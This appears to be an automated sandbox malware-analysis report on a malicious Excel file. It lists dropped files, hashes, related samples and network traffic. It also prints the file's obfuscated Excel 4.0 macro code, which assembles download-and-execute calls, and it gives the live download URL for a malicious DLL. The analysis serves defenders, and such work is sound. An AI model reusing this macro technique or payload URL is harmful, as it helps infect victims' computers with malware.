                            Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                            • 184.168.131.241
                            Swift002.exeGet hashmaliciousBrowse
                            • 50.62.160.230
                            36ne6xnkop.exeGet hashmaliciousBrowse
                            • 184.168.131.241
                            56UDmImzPe.dllGet hashmaliciousBrowse
                            • 107.180.90.10
                            Shipping doc&_B-Landen.exeGet hashmaliciousBrowse
                            • 50.62.137.41
                            Statement-ID261179932209970.vbsGet hashmaliciousBrowse
                            • 148.72.208.50
                            _.ryder.com._1602499153.666014.dllGet hashmaliciousBrowse
                            • 166.62.30.150
                            mW07jhVxX5.exeGet hashmaliciousBrowse
                            • 184.168.131.241
                            jEXf5uQ3DE.exeGet hashmaliciousBrowse
                            • 184.168.131.241

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:downloaded
                            Size (bytes):449536
                            Entropy (8bit):5.5101637778448955
                            Encrypted:false
                            SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                            MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                            SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                            SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                            SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                            Malicious:true
                            Reputation:low
                            IE Cache URL:http://living-traditions.com/blogs/click.php
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1P.Lu1..u1..u1..?T..t1...S..r1..u1..p1..eW..q1..eW..t1..eW..t1..Richu1..................PE..L....+t`...........!.....(..........m........@............................... ......(.....@.........................@@..D...hA..P................................... @...............................................@.. ............................text....&.......(.................. ..`.rdata..D....@.......,..............@..@.data...8@...P...B...0..............@....pdata...g.......h...r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\90DE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):80628
                            Entropy (8bit):7.888145041366286
                            Encrypted:false
                            SSDEEP:1536:ZnC+ow5JeueA6rWGH3WdPMAeWRlMVGoIahaDHTU6hryF70Ki9h:ZnC+oQirW23WhMg2sTU2yF70KiD
                            MD5:B0C770DA6FFF46D0500CCF97D7CDA12A
                            SHA1:664AE1F31F2012830589FD05CB8798918F6F0219
                            SHA-256:3BF029B9AB1A47C8BB4C5EB0DF93AC234CFF71835AA2D9E58C342F3A1BBD29BA
                            SHA-512:C1A27AAFEB6D561E23AEC2CDFE4EDD527AC92214853020F37F2F41402E1389619173FDE9B67ECD04561CF9EC7BB28E01A9A0A6302855779103CC213138CC8591
                            Malicious:false
                            Reputation:low
                            Preview: .U.n.0....?......(..r.Izl.4...9..s..$..wH+nb(^.......h~1.]=`....53V..N*.l.....WV..V.v.[......?.o..cEh.[..q.E..b.<Z.t..H....X....l...g..T.....+..^..z...o......R-S&..8.D..&.C.+..:..{..$Z..`.N.z..........}E!W^.x.0.~...%....~...|....s.f?Ivib..@...15.Dp...4R..}r.G. #/..#$_nr.N..N....&.. ...MNR...(.G#.&}..m...../r.Gd.G...M..aD^.o..Bs`9cZk.G.9....R.!......w7......1[.....}$.Kg.&8....<}..:ZF..0$..6.1....N.......D9...Of........PK..........!................[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\446446.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Mon Apr 12 23:05:38 2021, atime=Mon Apr 12 23:05:38 2021, length=106496, window=hide
                            Category:dropped
                            Size (bytes):1984
                            Entropy (8bit):4.464349531148646
                            Encrypted:false
                            SSDEEP:24:8Dnbk/XTd6jFyPDVeMsODv3qcTdM7dD2Dnbk/XTd6jFyPDVeMsODv3qcTdM7dV:8s/XT0jFwDVmlWQh2s/XT0jFwDVmlWQ/
                            MD5:4348595ED5C238F3A7464C51D0660C8B
                            SHA1:E63FE61EDDE7BE6C9F33EBF482C9452B52F2657F
                            SHA-256:727289508032F34D8792E6DFD9DE538C64EEE1A0932ADB30431893A482159B92
                            SHA-512:67193929EBE343C53FDB503307E034CA17218201E337B5BECF8449D140FC81E065567F7641F4BFC51B35EACBBB852072B8C1A74E872EE9C997AF7C2B8A9607CB
                            Malicious:false
                            Reputation:low
                            Preview: L..................F.... ......{..'.N../..H.U../...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2..R...R.. .446446.xls..B.......Q.y.Q.y*...8.....................4.4.6.4.4.6...x.l.s.......t...............-...8...[............?J......C:\Users\..#...................\\887849\Users.user\Desktop\446446.xls.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.4.6.4.4.6...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......887849..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L.......
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Mon Apr 12 23:05:38 2021, atime=Mon Apr 12 23:05:38 2021, length=8192, window=hide
                            Category:dropped
                            Size (bytes):867
                            Entropy (8bit):4.473944875294604
                            Encrypted:false
                            SSDEEP:12:85QD7LgXg/XAlCPCHaXtB8XzB/xqvX+WnicvbIsnbDtZ3YilMMEpxRljK3wXyTdK:85w/XTd6j6vYeMsbDv3qcTrNru/
                            MD5:0A126F4CE8A412A7E0B56FDD34D13F90
                            SHA1:205C7790F9A579AD5D87877D7D4A488A388B8AA8
                            SHA-256:9C63D6D21963E3AD8536BC4761DC624A4D7A490F608BFE2BDE5CC491B36C3606
                            SHA-512:B1A35E61AB7B52CFD5089807AE8B7EA604E52AFD6FE173EC324EACC8DDEC428A76ACF5024E8E41A030CAC311DBE52557D81A237DDEF72C953EE0F9C61A750386
                            Malicious:false
                            Reputation:low
                            Preview: L..................F...........7G..'.N../..'.N../... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\887849\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......887849..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):71
                            Entropy (8bit):4.032792717761047
                            Encrypted:false
                            SSDEEP:3:oyBVomMJRT30YVo730YVomMJRT30YVov:dj6J1E4B46J1E4y
                            MD5:E9BA10F8D1524D050B02A3E80256C566
                            SHA1:950B596DB0C42E0A9B02ACEEB0166DACB72B96AE
                            SHA-256:8B69C0A0164EEC53F4F1BEAD5E95EBE38B27A23903D4D08570DBA040E6E93C0B
                            SHA-512:9E626D38996BF29D3616FDCDB6CDDA07B141054294512ADA00A2E18A250F682EB34D0C3CA75796170D096183329298C695F099EAF2DB6FDA1181364033C4B3F3
                            Malicious:false
                            Reputation:low
                            Preview: Desktop.LNK=0..[xls]..446446.LNK=0..446446.LNK=0..[xls]..446446.LNK=0..
                            C:\Users\user\Desktop\51DE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Applesoft BASIC program data, first line number 16
                            Category:dropped
                            Size (bytes):138843
                            Entropy (8bit):6.821911851482883
                            Encrypted:false
                            SSDEEP:3072:e88rmjAItyzElBIL6lECbgBGGP5xLm7TD2jTUqyF70Ci6W2fXGUVxvfXGURH88rd:R8rmjAItyzElBIL6lECbgBvP5Nm7TUUJ
                            MD5:B68BAB90F3799DF7526E7FDF201A9D29
                            SHA1:50AFB3C63A6BD986AF93D8B15B8F783585FFC295
                            SHA-256:276BA2D933458EE7908C4B881C60C131A2CBDD8914ED4938DE68D74D10F95F78
                            SHA-512:D9CC208214B67AF0C5A0C84EB31B9975CB85F9392E63635CBA2946F7CC6B2F9D96434A05CF0C7A5D59ED92B8D8F18474FDDA68E8D120AA8F78DAD56635ACEF31
                            Malicious:false
                            Reputation:low
                            Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........
                            C:\Users\user\fdinmd.fii
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):449536
                            Entropy (8bit):5.5101637778448955
                            Encrypted:false
                            SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                            MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                            SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                            SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                            SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                            Malicious:true
                            Reputation:low
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1P.Lu1..u1..u1..?T..t1...S..r1..u1..p1..eW..q1..eW..t1..eW..t1..Richu1..................PE..L....+t`...........!.....(..........m........@............................... ......(.....@.........................@@..D...hA..P................................... @...............................................@.. ............................text....&.......(.................. ..`.rdata..D....@.......,..............@..@.data...8@...P...B...0..............@....pdata...g.......h...r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Apr 12 15:51:16 2021, Security: 0
                            Entropy (8bit):3.2150745788685295
                            TrID:
                            • Microsoft Excel sheet (30009/1) 78.94%
                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                            File name:446446.xls
                            File size:283136
                            MD5:1b62b4f4b16d6219dce4c6d145c5af79
                            SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
                            SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1
                            SHA512:1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e
                            SSDEEP:6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt
                            File Content Preview:........................>.......................'..........................."...#...$...%...&..................................................................................................................................................................

                            File Icon

                            Icon Hash:e4eea286a4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "446446.xls"

                            Indicators

                            Has Summary Info:True
                            Application Name:Microsoft Excel
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:True

                            Summary

                            Code Page:1251
                            Last Saved By:5
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2021-04-12 14:51:16
                            Creating Application:Microsoft Excel
                            Security:0

                            Document Summary

                            Document Code Page:1251
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False

                            Streams

                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.335261663834
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5SummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.244430475899
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . J . J . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                            Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 270942
                            General
                            Stream Path:Book
                            File Type:Applesoft BASIC program data, first line number 8
                            Stream Size:270942
                            Entropy:3.18416886572
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                            Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                            Macro 4.0 Code

                            "=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
                            ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                            ,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Apr 12, 2021 17:06:02.567907095 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.698780060 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.698952913 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.699388027 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.829914093 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888154984 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888185978 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888209105 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888232946 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888254881 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888258934 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888276100 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888279915 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888286114 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888300896 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888308048 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888324976 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888334990 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888350010 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888351917 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888376951 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888387918 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888410091 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.892734051 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019260883 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019337893 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019397020 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019450903 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019454956 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019486904 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019503117 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019509077 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019560099 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019568920 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019619942 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019619942 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019670010 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019670010 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019721985 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019721985 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019769907 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019773006 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019818068 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019830942 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019881964 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019882917 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019932985 CEST804916564.207.186.30192.168.2.22
